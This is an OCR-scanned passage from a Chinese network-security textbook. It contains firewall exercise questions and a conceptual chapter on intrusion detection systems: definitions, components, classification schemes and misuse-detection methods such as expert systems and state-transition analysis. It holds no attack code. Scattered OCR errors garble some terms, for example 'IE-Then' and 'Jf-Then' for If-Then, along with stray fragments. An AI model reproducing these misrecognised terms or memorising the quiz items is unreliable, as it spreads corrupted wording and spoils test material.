4. 在 下 列 防火 墙 体系 结构 中 相对 最 安全 的 是 (  )。 
A. 双重 宿主 主机 结构 B. 屏蔽 主机 结构 


C. 屏蔽 子 网 结构 
5. 下 列 不 属于 防火 墙 的 性 能 指标 的 是 (  )。 


A. 防火 墙 的 并 发 连接 数 B. 防火 墙 的 转发 速率 
C. 防火 墙 的 延 时 D. 防火 墙 的 运行 环境 
6. 基于 防火 墙 的 功能 分 类 ， 有 _@ 防火 墙 等 ; 基于 防火 墙 的 工作 原理 分 类 ， 有 _@ 防 
火 墙 等 。 
( ” ) @ A:. 包 过 滤 、 代 理 服务 和 状态 检测 
B. 基于 路 由 器 和 基于 主机 系统 
C. FTP、TELNET、E-mail 和 病毒 
D. 双 穴 主机 、 主 机 过 滤 和 子 网 过 滤 
( ”) @@ A. 包 过 滤 、 代 理 服 务 和 状态 检测 
B. 基于 路 由 器 和 基于 主机 系统 
C. FTP、TELNET、E-mail 和 病毒 
D. 双 穴 主 机 、 主 机 过 滤 和 子 网 过 滤 


7. 将 防火 软件 安装 在 路 由 器 上 ， 就 构成 了 简单 的 _@ _; 不 管 是 哪 种 防火 墙 ， 都 不 能 


( ” ) @ A， 包 过 滤 防 火 墙 B. 子 网 过 滤 防 火 墙 
C. 代理 服务 器 防火 墙 D. 主机 过 小 防 火 墙 

( ) @ A. 强化 网 络 安全 策略 B. 对 网 络 存 取 和 访问 进行 监控 审计 
C.， 防止 内 部 信息 的 外 泄 ”D. 防范 绕 过 它 的 连接 

三 、 简 答题 

1. 什么 是 防火 墙 ? 防火 墙 有 什么 作用 ? 

2. 防火 墙 有 哪些 优 、 缺 点 ? 

3. 包 过 滤 防 火 墙 、 应 用 代理 防火 墙 、 状 态 监视 防火 墙 各 有 哪些 优 、 缺 点 ? 

4. 防火 墙 的 体系 结构 有 哪些 ? 各 有 什么 优 、 缺 点 ? 

5. 防火 墙 的 组 合 结构 一 般 有 哪 几 种 形式 ? 

6. 选 型 防火 墙 时 应 遵循 哪些 基本 原则 ? 

7. 选择 防火 墙 时 应 注意 哪些 事项 ? 

8. 评价 防火 墙 性 能 的 指标 有 哪些 ? 
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学 习 目 标 

系统 的 学 习 入 侵 检测 基本 知识 ， 入 侵 检测 模型 和 体系 结构 及 入 侵 检测 与 其 他 安全 系统 
的 协同 。 通 过 对 本 章 内 容 的 学 习 ， 读 者 应 掌握 及 了 解 以 下 内 容 。 

@ ”掌握 入 侵 监测 的 概念 、 组 成 、 功 能 及 分 类 ， 入 侵 检测 模型 和 体系 结构 。 

@ 了解 常用 的 入 侵 检测 技术 ， 入 侵 检测 系统 与 协同 ， 入 侵 检测 发 展现 状 和 趋势 。 


7.1 ”入侵 检测 概述 


随 着 黑客 入 侵 的 日 益 猛 狐 ， 人 们 发 现 只 从 防御 的 角度 构造 安全 系统 是 不 够 的 。 入 侵 检 
测 技术 是 继 “ 防 火 墙 ”“ 访 问 控制 ”等 传统 安全 保护 措施 后 新 一 代 的 安全 保障 技术 。 他 对 
计算 机 和 网 络 资源 上 的 恶意 使 用 行为 进行 识别 和 响应 ， 他 不 仅 检 测 来 自 外 部 的 入 侵 行为 ， 
同时 也 监督 内 部 用 户 的 未 授权 活动 。 入 侵 检 测 技术 是 一 种 主动 保护 自己 的 网 络 和 系统 免 遭 
非法 攻击 的 网 络 安全 技术 ， 它 从 计算 机 系统 或 者 网 络 中 收集 、 分 析 信 息 ， 检 测 任 何 企图 破 
坏 计算 机 资源 的 完整 性 (Integrity)、 机 密 性 (Confidentiality) 和 可 用 性 (Availability) 的 行为 ， 即 
查看 是 否 有 违反 安全 策略 的 行为 和 遭 到 攻击 的 迹象 ， 并 做 出 相应 的 反应 。 


7.1.1 入 侵 检测 概念 


不 同 于 防火 墙 技术 ， 入 侵 检 测 是 相对 缓和 的 网 络 安全 技术 ， 它 是 一 种 被 动 的 和 事后 的 
机 制 技术 措施 。 与 防火 墙 技术 相 比 ， 虽 然 目 前 的 入 侵 检测 商业 产品 实用 性 不 高 ， 不 是 难以 
配置 和 维护 ， 就 是 有 较 高 的 虚 警 率 ， 给 人 的 总 体感 觉 是 有 负 盛 名 ， 但 是 随 着 网 络 安全 技术 
的 发 展 ， 入 侵 检测 系统 会 在 整个 网 络 安全 体系 中 占有 越 来 越 重 要 的 地 位 。 作 为 一 种 积极 主 
动 的 安全 防护 技术 ， 入 侵 检测 提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保护 ， 在 网 络 
系统 受到 危害 之 前 拦截 和 响应 入 侵 。 从 网 络 安全 立体 纵深 、 多 层次 防护 的 角度 出 发 ， 入 侵 
检测 理应 受到 人 们 的 高 度 重视 ， 这 从 国外 入 侵 检测 产品 市 场 的 蓬勃 发 展 就 可 以 看 出 。 

James Anderson 在 20 世纪 80 年 代 早期 首先 提出 了 入 侵 检测 的 概念 ， 他 将 入 侵 尝试 
(Intrusion Attempt) 或 威胁 (Threat) 定 义 为 潜在 的 、 有 预谋 的 、 未 经 授权 的 访问 信息 、 操 作 信 
息 ， 致 使 系统 不 可 靠 或 无 法 使 用 的 活动 。 

Heady 给 出 了 另 一 个 入 侵 的 定义 ， 入 侵 是 指 试图 破坏 资源 的 完整 性 、 机 密 性 及 可 用 性 
的 活动 集合 。 

Smaha 从 分 类 角度 指出 入 侵 包括 尝试 性 冯 入 、 伪 装 攻击 、 安 全 控制 系统 渗透 与 泄露 、 
拒绝 服务 、 恶 意 使 用 等 5 种 类 型 。 

这 里 对 入 侵 检测 相关 的 一 些 基 本 概念 作 以 下 通俗 的 定义 。 

@ ”入 侵 (Intrusion) 指 的 就 是 试图 破坏 计算 机 保密 性 、 完 整 性 、 可 用 性 或 可 控 性 的 一 系 

列 活动 。 
@ 入侵 活动 包括 非 授 权 用 户 试图 存 取 数据 、 处 理 数 据 ， 或 者 妨碍 计算 机 正常 运行 等 
活动 。 
@ 入 侵 检测 (Intrusion Detection) 就 是 对 计算 机 网 络 和 计算 机 系统 的 关键 节点 信息 进行 
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收集 分 析 ， 检 测 其 中 是 否 有 违反 安全 策略 的 事件 发 生 或 攻击 迹象 ， 并 通知 系统 安 
全 管理 员 (Site Security Officer)。 
@ 入 侵 检 测 系统 (Intrusion Detection System，IDS) 是 用 于 入 侵 检 测 的 软件 和 硬件 的 合 
称 ， 是 加 载 入 侵 检测 技术 的 系统 。 
一 般 情况 下 ， 并 不 严格 地 去 区 分 入 侵 检测 和 入 侵 检 测 系 统 两 个 概念 ， 而 都 称 其 为 IDS 
或 入 侵 检测 技术 。 


7.1.2 入侵 检 测 系统 组 成 


入 侵 检测 系统 的 基本 构成 如 图 7.1 所 示 ， 通 常 由 以 下 基本 组 件 构成 。 


事件 产生 器 事件 分 析 器 


事件 数据 库 响应 单元 


7.1 入 侵 监测 系统 的 基本 构成 框图 


(1) 事件 产生 器 。 事 件 产生 器 是 入 侵 检 测 系统 中 负责 原始 数据 采集 的 部 分 ， 它 对 数据 
流 、 日 志文 件 等 进行 追踪 ， 然 后 将 搜集 到 的 原始 数据 转换 为 事件 ， 并 向 系统 的 其 他 部 分 提 
供 此 事件 。 

(2) 事件 分 析 器 。 事 件 分 析 器 接收 事件 信息 ， 然 后 对 它们 进行 分 析 ， 判 断 是 否 为 入 侵 
行为 或 异常 现象 ， 最 后 将 判断 的 结果 转变 为 警告 信息 。 

(3) 事件 数据 库 。 事 件数 据 库 是 存放 各 种 中 间 和 最 终 数据 的 地 方 。 它 从 事件 产生 器 或 
事件 分 析 器 接收 数据 ， 并 将 数据 较 长 时 间 保 存 。 事 件数 据 库 既 可 以 是 复杂 的 数据 库 ， 也 可 
以 是 简单 的 文本 文件 。 

(4) 响应 单元 。 响 应 单元 根据 警告 信息 做 出 切断 连接 、 改 变 文件 属性 等 强烈 反应 ， 也 
可 以 只 是 简单 地 报警 ， 是 入 侵 检测 系统 中 的 主动 武器 。 

以 上 4 个 部 分 只 是 入 侵 检测 系统 的 基本 组 成 部 分 。 从 具体 实现 的 角度 看 ， 入 侵 检测 系 
统 包括 硬件 和 软件 两 部 分 。 硬 件 设备 主要 完成 数据 的 采集 和 响应 的 实施 ， 软 件 部 分 主要 完 
成 数据 的 处 理 、 入 侵 的 判断 、 响 应 的 决策 等 。 

基于 主机 的 入 侵 检测 系统 相对 简单 ， 基 于 网 络 的 入 侵 检测 系统 要 复杂 一 些 ， 一 般 采 用 
分 层 分 布 式 结 构 ， 主 要 分 为 数据 采集 层 、 分 析 层 和 管理 层 。 数 据 采集 层 主要 用 于 “ 抓 
包 ”， 必 要 时 做 一 些 分 包 和 拆 包 工作 ; 分 析 层 得 到 数据 后 对 数据 进行 分 析 和 判断 ， 决 定 是 
否 属 于 入 侵 行 为 或 给 出 怀疑 值 ， 管 理 层 对 分 析 层 的 上 报 结果 进行 决策 ， 做 出 响应 ， 同 时 还 担 
负 系 统 维护 、 人 机 交互 等 任务 。 在 网 络 中 需要 检测 的 点 比较 多 ， 所 以 常 采用 分 布 式 的 结构 。 
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7.1.3 ”入 侵 检测 功能 


入 侵 检测 系统 能 在 入 侵 攻 击 对 系统 发 生 危 害 前 检测 到 入 侵 攻 击 ， 并 利用 报警 与 防护 系 
统 驱 逐 入 侵 攻 击 ， 在 入 侵 攻击 过 程 中 ， 尽 可 能 减少 入 侵 攻击 所 造成 的 损失 ， 在 被 入 侵 攻击 
后 ， 能 收集 入 侵 攻击 的 相关 信息 ， 作 为 防范 系统 的 知识 添加 到 知识 库 内 ， 从 而 增强 系统 的 
防范 能 

入 侵 检测 功能 大 致 分 为 以 下 几 个 方面 。 

1. 监控 、 分 析 用 户 和 系统 的 活动 


这 是 入 侵 检测 系统 能 够 完成 入 侵 检测 任务 的 前 提 条 件 。 入 侵 检测 系统 通过 获取 进出 某 
台 主 机 及 整个 网 络 的 数据 ， 或 者 通过 查看 主机 日 志 等 信息 来 监控 用 户 和 系统 活动 。 获 取 网 
络 数据 的 方法 一 般 是 “ 抓 包 ”， 即 将 数据 流 中 的 所 有 包 都 抓 下 来 进行 分 析 。 

如 果 入 侵 检测 系统 不 能 实时 地 截获 数据 包 并 对 它们 进行 分 析 ， 就 会 出 现 漏 包 或 网 络 阻 
塞 的 现象 。 前 一 种 情况 下 系统 的 漏 报 会 很 多 ， 后 一 种 情况 会 影响 到 入 侵 检测 系统 所 在 主机 
或 网 络 的 数据 流速 ， 入 侵 检测 系统 成 为 整个 系统 的 瓶颈 。 因 此 ， 入 侵 检 测 系统 不 仅 要 能 够 
监控 、 分 析 用 户 和 系统 的 活动 ， 还 要 使 这 些 操作 足够 快 。 


2. 发 现 入 侵 企图 或 异常 现象 


这 是 入 侵 检测 系统 的 核心 功能 。 主 要 包括 两 个 方面 ， 一 是 入 侵 检测 系统 对 进出 网 络 或 
主机 的 数据 流 进行 监控 ， 查 看 是 否 存在 入 侵 行为 ， 另 一 方面 则 评估 系统 关键 资源 和 数据 文 
件 的 完整 性 ， 查 看 系统 是 否 已 经 遭受 了 入 侵 。 前 者 的 作用 是 在 入 侵 行为 发 生 时 及 时 发 现 ， 
从 而 避免 系统 遭受 攻击 ;而 后 者 一 般 是 攻击 行为 已 经 发 生 ， 但 可 以 通过 攻击 行为 留 下 的 痕 
迹 的 一 些 情况 ， 从 而 避免 再 次 遭受 攻击 。 对 系统 资源 完整 性 的 检查 也 有 利于 对 攻击 者 进行 
追踪 或 者 取证 。 

对 于 网 络 数据 流 的 监控 ， 可 以 使 用 异常 检测 的 方法 ， 也 可 以 使 用 误 用 检测 的 方法 。 目 
前 还 有 很 多 新 技术 ， 但 多 数 都 还 处 于 理论 研究 阶段 。 现 在 的 入 侵 检测 产品 使 用 的 主要 还 是 
模式 匹配 技术 。 检 测 技术 的 好 坏 ， 直 接 关 系 到 系统 能 否 精确 地 检测 出 攻击 ， 因 此 ， 对 于 这 
方面 的 研究 是 入 侵 检 测 系统 研究 领域 的 主要 工作 。 


3. 记录 、 报 警 和 响应 


入 侵 检测 系统 在 检测 到 攻击 后 ， 应 该 采取 相应 的 措施 来 阻止 或 响应 攻击 。 它 应 该 首先 
记录 攻击 的 基本 情况 ， 其 次 应 该 能 够 及 时 发 出 警告 。 良 好 的 入 侵 检测 系统 ， 不 仅 应 该 能 把 
相关 数据 记录 在 文件 或 数据 库 中 ， 还 应 该 提供 报表 打印 功能 。 必 要 时 ， 系 统 还 能 够 采取 必 
要 的 响应 行为 ， 如 拒绝 接收 所 有 来 自 某 台 计算 机 的 数据 、 追 踪 入 侵 行为 等 。 实 现 与 防火 墙 
等 安全 部 件 的 交互 响应 ， 也 是 入 侵 检测 系统 需要 研究 和 完善 的 功能 之 一 。 

作为 一 个 功能 完善 的 入 侵 检 测 系统 ， 除 具备 上 述 基 本 功能 外 ， 还 应 该 包括 其 他 一 些 功 
能 ， 比 如 审计 系统 的 配置 和 弱点 评估 、 关 键 系统 和 数据 文件 的 完整 性 检查 等 。 此 外 ， 入 侵 
检测 系统 还 应 该 为 管理 员 和 用 户 提供 友好 、 易 用 的 界面 ， 方 便 管理 员 设置 用 户 权 限 、 管 理 
数据 库 、 手 工 设置 和 修改 规则 、 处 理 报警 和 浏览 、 打 印 数据 等 。 
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7.2 ”入侵 检测 系统 分 类 


根据 不 同 的 分 类 标准 ， 入 侵 检测 系统 可 分 为 不 同 的 类 别 。 对 于 入 侵 检测 系统 要 考虑 的 
因素 (分 类 依据 ) 主 要 有 数据 源 、 入 侵 、 事 件 生成 、 事 件 处 理 及 检测 方法 等 。 


7.2.1 根据 数据 源 分 类 


入 侵 检测 系统 要 对 所 监控 的 网 络 或 主机 的 当前 状态 做 出 判断 ， 需 要 以 原始 数据 中 包含 
的 信息 为 基础 。 按 照 原始 数据 的 来 源 ， 可 以 将 入 侵 检测 系统 分 为 基于 主机 的 入 侵 检测 系 
统 、 基 于 网 络 的 入 侵 检测 系统 和 基于 应 用 的 入 侵 检测 系统 等 类 型 。 

1. 基于 主机 的 入 侵 检测 系统 

基于 主机 的 入 侵 检测 系统 主要 用 于 保护 运行 关键 应 用 的 服务 器 ， 它 通过 监视 与 分 析 主 
机 的 审计 记录 和 日 志文 件 来 检测 入 侵 ， 日 志 中 包含 发 生 在 系统 上 的 不 寻常 活动 的 证 据 ， 这 
些 证 据 可 以 指出 有 人 正在 入 侵 或 已 成 功 入 侵 了 系统 。 通 过 查看 日 志文 件 ， 能 够 发 现成 功 的 
入 侵 或 入 侵 企图 ， 并 启动 相应 的 应 急 措施 。 

通常 情况 下 ， 基 于 主机 的 入 侵 检测 系统 可 监测 系统 、 事 件 、Windows NT 下 的 安全 记 
录 以 及 UNIX 环境 下 的 系统 记录 ， 从 中 发 现 可 疑 行为 。 当 有 文件 发 生变 化 时 ， 入 侵 检测 系 
统 将 新 的 记录 条 目 与 攻击 标记 相 比较 ， 看 它们 是 否 匹 配 。 如 果 匹 配 ， 系 统 就 会 向 管理 员 报 
警 。 对 关键 系统 文件 和 可 执行 文件 的 入 侵 检测 的 常用 方法 是 通过 定期 检查 校 验 和 来 进行 
的 ， 以 便 发 现 意外 的 变化 。 反 应 的 快慢 与 轮 询 间隔 的 频率 有 直接 的 关系 。 此 外 ， 许 多 入 侵 
检测 系统 还 能 够 监听 主机 端口 的 活动 ， 并 在 特定 端口 被 访问 时 向 管理 员 报警 。 

2. 基于 网 络 的 入 侵 检测 系统 

基于 网 络 的 入 侵 检测 系统 主要 用 于 实时 监控 网 络 关键 路 径 的 信息 ， 它 能 够 监听 网 络 上 
的 所 有 分 组 ， 并 采集 数据 以 分 析 可 疑 现象 。 

基于 网 络 的 入 侵 检测 系统 使 用 原始 网 络 包 作为 数据 源 ， 通 常 利用 一 个 运行 在 混杂 模式 
下 的 网 络 适 配器 来 实时 监视 ， 并 分 析 通过 网 络 的 所 有 通信 业务 。 基 于 网 络 的 入 侵 检测 系统 
可 以 提供 许多 基于 主机 的 入 侵 检测 法 无 法 提供 的 功能 。 许 多 客户 在 最 初 使 用 入 侵 检 测 系统 
时 ， 都 配置 了 基于 网 络 的 入 侵 检测 。 


3. 基于 应 用 的 入 侵 检测 系统 


基于 应 用 (Application) 的 入 侵 检测 系统 是 基于 主机 的 入 侵 检测 系统 的 一 个 特殊 子 集 ，j 
特性 、 优 缺点 与 基于 主机 的 入 侵 检测 系统 基本 相同 。 由 于 这 种 技术 能 够 更 准确 地 监控 用 户 
某 一 应 用 行为 ， 所 以 在 日 益 流行 的 电子 商务 中 越 来 越 受 到 注意 。 

这 3 种 入 侵 检测 系统 具有 互补 性 。 基 于 网 络 的 入 侵 检 测 能 够 客观 地 反映 网 络 活动 ， 特 
别 是 能 够 监视 到 系统 审计 的 盲区 ;而 基于 主机 和 基于 应 用 的 入 侵 检测 能 够 更 加 精确 地 监视 
系统 中 的 各 种 活动 。 


i 


他 


T 
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7.2.2 根据 检测 原理 分 类 


根据 系统 所 采用 的 检测 方法 ， 将 入 侵 检 测 分 为 异常 入 侵 检测 和 误 用 入 侵 检 测 两 类 。 

(1) 异常 入 侵 检 测 。 异 常 入 侵 检 测 是 指 能 够 根据 异常 行为 和 使 用 计算 机 资源 的 情况 检 
测 入 侵 。 异 常 入 侵 检测 试图 用 定量 的 方式 描述 可 以 接受 的 行为 特征 ， 以 区 分 非 正 常 的 、 潜 
在 的 入 侵 行为 。Anderson 做 了 如 何 通 过 识别 “异常 ”行为 来 检测 入 侵 的 早期 工作 ， 他 提出 
了 一 个 威胁 模型 ， 将 威胁 分 为 外 部 闻 入 (用 户 虽 然 授权 ， 但 对 授权 数据 和 资源 的 使 用 不 合 
法 ， 或 滥用 授权 )、 内 部 渗透 和 不 当 行 为 3 种 类 型 ， 并 采用 这 种 分 类 方法 开发 了 一 个 安全 监 
视 系统 ， 可 检测 用 户 的 异常 行为 。 

(2) 误 用 入 侵 检测 。 误 用 入 侵 检 测 是 指 利用 已 知 系统 和 应 用 软件 的 弱点 攻击 模式 来 检 
测 入 侵 。 与 异常 入 侵 检测 不 同 ， 误 用 入 侵 检测 能 直接 检测 不 利 或 不 可 接受 的 行为 ， 而 异常 
入 侵 检测 则 是 检查 出 与 正常 行为 相 违背 的 行为 。 


7.2.3 ”根据 体系 结构 分 类 


按照 体系 结构 ， 入 侵 检 测 系统 可 分 为 集中 式 、 等 级 式 和 协作 式 3 种 。 
1. 集中 式 


集中 式 入 侵 检 测 系统 包含 多 个 分 布 于 不 同 主机 上 的 审计 程序 ， 但 只 有 一 个 中 央 入 侵 检 
测 服务 器 ， 审 计 程 序 把 收集 到 的 数据 发 送 给 中 央 服 务 器 进行 分 析 处 理 。 这 种 结构 的 入 侵 检 
测 系统 在 可 伸缩 性 、 可 配置 性 方面 存在 致命 缺陷 。 随 着 网 络 规模 的 增加 ， 主 机 审计 程序 和 
服务 器 之 间 传 送 的 数据 量 激增 ， 会 导致 网 络 性 能 大 大 降低 。 并 且 一 旦 中 央 服 务 器 出 现 故 
障 ， 整 个 系统 就 会 陷入 瘫痪 。 此 外 ， 根 据 各 个 主机 不 同 需求 配置 服务 器 也 非常 复杂 。 


2. 等 级 式 


在 等 级 式 (部 分 分 布 式 ) 入 侵 检测 系统 中 ， 定 义 了 若干 个 分 等 级 的 监控 区 域 ， 每 个 入 侵 
检测 系统 负责 一 个 区 域 ， 每 一 级 入 侵 检测 系统 只 负责 分 析 所 监控 区 域 ， 然 后 将 当地 的 分 析 
结果 传送 给 上 一 级 入 侵 检测 系统 。 

这 种 结构 存在 以 下 问题 。 首 先 ， 当 网 络 拓扑 结构 改变 时 ， 区 域 分 析 结 果 的 汇总 机 制 也 
需要 做 相应 的 调整 ， 其 次 ， 这 种 结构 的 入 侵 检测 系统 最 终 还 是 要 把 收集 到 的 结果 传送 到 最 
高 级 的 检测 服务 器 进行 全 局 分 析 ， 所 以 系统 的 安全 性 并 没有 实质 性 改进 。 

3. 协作 式 

协作 式 (分 布 式 ) 入 侵 检测 系统 将 中 央 检 测 服务 器 的 任务 分 配给 多 个 基于 主机 的 入 侵 检 
测 系统 ， 这 些 入 侵 检 测 系统 不 分 等 级 ， 各 司 其 职 ， 负 责 监控 当地 主机 的 某 些 活动 。 所 以 ， 
可 伸缩 性 、 安 全 性 都 得 到 了 显著 的 提高 ， 但 维护 成 本 也 相应 增 大 ， 并 且 增 加 了 所 监控 主机 
的 工作 负荷 ， 如 通信 机 制 、 审 计 开 销 、 踪 迹 分 析 等 。 
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7.2.4 根据 工作 方式 分 类 


入 侵 检测 系统 根据 工作 方式 可 分 为 离线 检测 系统 和 在 线 检测 系统 。 

(D 离线 检测 。 离 线 检测 系统 是 一 种 非 实 时 工作 的 系统 ， 在 事件 发 生 后 分 析 审 计 事 
件 ， 从 中 检查 入 侵 事 件 。 这 类 系统 的 成 本 低 ， 可 以 分 析 大 量 事件 ， 调 查 长 期 的 情况 ; 但 由 
于 是 在 事后 进行 的 ， 不 能 对 系统 提供 及 时 的 保护 ， 而 且 很 多 入 侵 在 完成 后 都 会 将 审计 事件 
措 除 ， 因 而 无 法 审计 。 

(2) 在 线 检测 。 在 线 检测 对 网 络 数据 包 或 主机 的 审计 事件 进行 实时 分 析 ， 可 以 快速 响 
应 ， 保 护 系统 安全 ; 但 在 系统 规模 较 大 时 难以 保证 实时 性 。 


7.2.5 根据 系统 其 他 特征 分 类 

作为 一 个 完整 的 系统 ， 其 系统 特征 同样 值得 认真 研究 。 一 般 来 说 ， 可 以 将 以 下 一 些 重 
要 特征 作为 分 类 的 考虑 因素 。 

1. 系统 的 设计 目标 

不 同 的 入 侵 检测 系统 有 不 同 的 设计 目标 。 有 的 只 提供 记 账 功能 ， 其 他 功能 由 系统 操作 
人 员 完成 ， 有 的 提供 响应 功能 ， 根 据 所 作出 的 判断 自动 采取 相应 的 措施 。 

2. 事件 生成 / 收集 的 方式 


根据 入 侵 检测 系统 收集 事件 信息 的 方式 ， 可 分 为 基于 事件 的 和 基于 轮 询 的 两 类 。 

基于 事件 的 方式 也 称 为 被 动 映射 ， 检 测 器 持续 地 监控 事件 流 ， 事 件 的 发 生 激活 信息 的 
收集 ， 基 于 轮 询 的 方式 也 称 为 主动 映射 ， 检 测 器 主动 查看 各 监控 对 象 ， 以 收集 所 需 信 息 ， 
并 判断 一 些 条 件 是 否 成 立 。 

3. 检测 时 间 (同步 技术 ) 

根据 系统 监控 到 事件 和 对 事件 进行 分 析 处 理 之 间 的 时 间 间 隔 ， 可 分 为 实时 和 延 时 两 
类 。 有 些 系统 以 实时 或 近乎 实时 的 方式 持续 地 监控 从 信息 源 检测 出 来 的 信息 ; 而 另 一 些 系 
统 在 收集 到 信息 后 ， 要 隔 一 定 的 时 间 后 才能 进行 处 理 。 

4. 入 侵 检测 响应 方式 

根据 入 侵 检测 响应 方式 不 同 ， 可 分 为 主动 响应 和 被 动 响应 。 被 动 响 应 型 系统 只 会 发 出 
告警 通知 ， 将 发 生 的 不 正常 情况 报告 给 管理 员 ， 本 身 并 不 试图 降低 所 造成 的 破坏 ， 更 不 会 
主动 地 对 攻击 者 采取 反击 行动 。 

主动 响应 系统 可 以 分 为 两 类 ， 对 被 攻击 系统 实施 控制 和 对 攻击 系统 实施 控制 。 对 攻 寺 
系统 实施 控制 比较 困难 ， 主 要 采用 对 被 攻击 系统 实施 控制 ， 通 过 调整 被 攻击 系统 的 状态 ， 
阻止 或 减轻 攻击 影响 ， 如 断 开 网 络 连接 、 增 加 安全 日 志 、 杀 死 可 疑 进程 等 。 

5. 数据 处 理 地 点 
审计 数据 可 以 集中 处 理 ， 也 可 以 分 布 处 理 。 
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这 些 不 同 的 分 类 方法 可 以 从 不 同 的 角度 了 解 、 认 识 入 侵 检 测 系统 ， 或 者 认识 入 侵 检测 
系统 所 具有 的 不 同 功 能 。 但 实际 的 入 侵 检测 系统 常常 要 综合 采用 多 种 技术 ， 具 有 多 种 功 
能 ， 因 此 很 难 将 一 个 实际 的 入 侵 检测 系统 归于 某 一 类 ， 它 们 通常 是 这 些 类 别 的 混合 体 ， 某 
个 类 别 只 是 反映 了 这 些 系统 的 一 个 侧面 。 


7.3 入侵 检测 技术 


入 侵 检 测 系统 常用 的 检测 技术 有 误 用 检测 、 异 常 检 测 与 高 级 检测 技术 。 本 节 在 介绍 入 
侵 检测 技术 的 同时 ， 也 将 对 入 侵 响 应 技术 进行 全 面 分 析 。 


7.3.1 误 用 检测 技术 


误 用 检测 技术 指 通 过 将 收集 到 的 数据 与 预先 确定 的 特征 知识 库 里 的 各 种 攻击 模式 进行 
比较 ， 如 果 发 现 有 攻击 特征 ， 则 判断 有 攻击 ， 对 检测 已 知 攻击 比较 有 效 。 特 征 知识 库 是 将 
已 知 的 攻击 方法 和 技术 的 特征 提取 出 来 ， 建 立 的 一 个 知识 库 。 

常用 的 误 用 检测 技术 有 专家 系统 、 模 型 推理 和 状态 转换 分 析 等 。 


1. 专家 系统 


专家 系统 是 误 用 检测 技术 中 运用 最 多 的 一 种 方法 。 它 将 有 关 入 侵 的 知识 转化 为 IE-Then 
结构 的 规则 ， 即 将 构成 入 侵 所 要 求 的 条 件 转化 为 Hf 部 分 ， 将 发 现 入 侵 后 采取 的 相应 措施 转 
化 成 Then 部 分 。 当 其 中 某 个 或 某 部 分 条 件 满足 时 ， 系 统 就 判断 为 入 侵 行 为 发 生 。 其 中 的 
Jf-Then 结构 构成 了 描述 具体 攻击 的 规则 库 ， 状 态 行为 及 其 语义 环境 可 根据 审计 事件 得 到 ， 
推理 机 制 根据 规则 和 行为 完成 判断 工作 。 

在 具体 实现 中 ， 专 家 系统 主要 面临 以 下 问题 : 全 面 性 问题 ， 即 难以 科学 地 从 各 种 入 侵 
手段 中 抽象 出 全 面 的 规则 化 知识 ;效率 问题 ， 即 需要 处 理 的 数据 量 过 大 ， 而 且 在 大 型 系统 
上 如 何 获得 实时 、 连 续 的 审计 数据 也 是 个 问题 。 

由 于 存在 以 上 问题 ， 商 业 产 品 一 般 不 采用 专家 系统 ， 而 采用 模型 推理 和 状态 转换 分 析 
方法 。 

2. 模型 推理 


模型 推理 是 指 结合 攻击 脚本 推理 出 入 侵 行 为 是 否 出 现 ， 其 中 攻击 行为 描述 攻击 目的 、 
攻击 步骤 以 及 对 系统 的 特殊 使 用 等 。 
根据 这 些 知 识 建立 攻击 脚本 库 ， 每 一 脚本 都 由 一 系列 攻击 行为 组 成 。 检 测 时 先 将 这 些 
攻击 脚本 的 子 集 看 作 系统 正面 临 的 攻击 ， 然 后 通过 一 个 称 为 预测 器 的 程序 模块 根据 当前 行 
为 模式 ， 产 生 下 一 个 需要 验证 的 攻击 脚本 子 集 ， 并 传 给 决策 器 。 决 策 器 收 到 信息 后 ， 根 据 
这 些 假设 的 攻击 行为 在 审计 记录 中 可 能 出 现 的 方式 ， 将 其 翻译 成 与 特定 系统 匹配 的 审计 记 
录 格 式 ， 最 后 在 审计 记录 中 寻找 相应 信息 来 确认 或 否认 这 些 攻击 。 初 始 攻击 脚本 子 集 的 假 
设 应 易于 在 审计 记录 中 识别 ， 且 出 现 频率 很 高 。 随 着 一 些 脚本 被 确认 的 次 数 增 多 ， 另 一 些 
脚本 被 确认 的 次 数 减少 ， 攻 击 脚 本 不 断 得 到 更 新 。 

模型 推理 方法 的 优点 是 对 不 确定 性 的 推理 有 合理 的 数学 理论 基础 ， 同 时 决策 器 使 得 攻 
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# 脚 本 可 以 与 审计 记录 的 上 下 文 无 关 。 此 外 ， 这 种 检测 方法 也 减少 了 需要 处 理 的 数据 量 ， 
因为 它 首先 按 脚本 类 型 检测 相应 类 型 是 否 出 现 ， 然 后 再 检测 具体 的 事件 。 其 缺点 在 于 创建 
入 侵 检测 模型 的 工作 量 比 别 的 方法 要 大 ， 在 系统 实现 时 ， 决 策 器 如 何 有 效 地 翻译 攻击 脚本 
也 是 一 个 问题 。 

3. 状态 转换 分 析 


状态 转换 分 析 最 早 由 R.Kemmerer 提出 ， 即 将 状态 转换 图 应 用 于 入 侵 行 为 的 分 析 。 

状态 转换 法 将 入 侵 过 程 看 作 一 个 行为 序列 ， 这 个 行为 序列 导致 系统 从 初始 状态 转 入 被 
入 侵 状 态 。 分 析 时 ， 首 先 针对 每 一 种 入 侵 方法 确定 系统 的 初始 状态 和 被 入 侵 状 态 ， 以 及 导 
致 状态 转换 的 转换 条 件 ， 即 导致 系统 进入 被 入 侵 状 态 必 须 执行 的 操作 (特征 事件 )。 然 后 
状态 转换 图 来 表示 每 一 个 状态 和 特征 事件 ， 这 些 事件 被 集成 于 模型 中 ， 所 以 检测 时 不 需要 
逐条 查找 审计 记录 。 但 是 ， 状 态 转换 是 针对 事件 序列 进行 的 分 析 ， 所 以 不 善于 分 析 过 于 复 
杂 的 事件 ， 而 且 不 能 检测 与 系统 状态 无 关 的 入 侵 。 

同 专家 系统 一 样 ， 对 事件 序列 分 析 也 需要 知道 攻击 行为 的 具体 知识 。 但 是 ， 攻 击 方法 
的 语义 描述 不 是 被 转化 为 检测 规则 ， 而 是 在 审计 记录 中 能 直接 找到 的 信息 形式 。 这 样 就 不 
像 专 家 系统 一 样 需要 处 理 大 量 数据 ， 从 而 大 大 提高 了 检测 效率 。 这 种 方法 的 缺陷 也 和 所 有 
其 他 的 误 用 检测 方法 一 样 ， 需 要 经 常 为 新 发 现 的 系统 漏洞 更 新 知识 库 。 另 外 ， 由 于 对 不 同 
操作 系统 平台 的 具体 攻击 方法 不 同 ， 以 及 不 同 平台 的 审计 方式 不 同 ， 所 以 构造 和 维护 的 工 
作 量 都 较 大 。 

Petri 网 就 是 一 种 类 似 于 状态 转换 图 分 析 的 方法 。 它 能 一 般 化 、 图 形 化 地 表达 状态 ， 并 
且 简 洁 明 了 。 虽 然 复 杂 的 入 侵 特征 能 用 Petri 网 表达 得 很 简单 ， 但 是 对 原始 数据 匹配 时 的 计 
算 量 却 很 大 。 


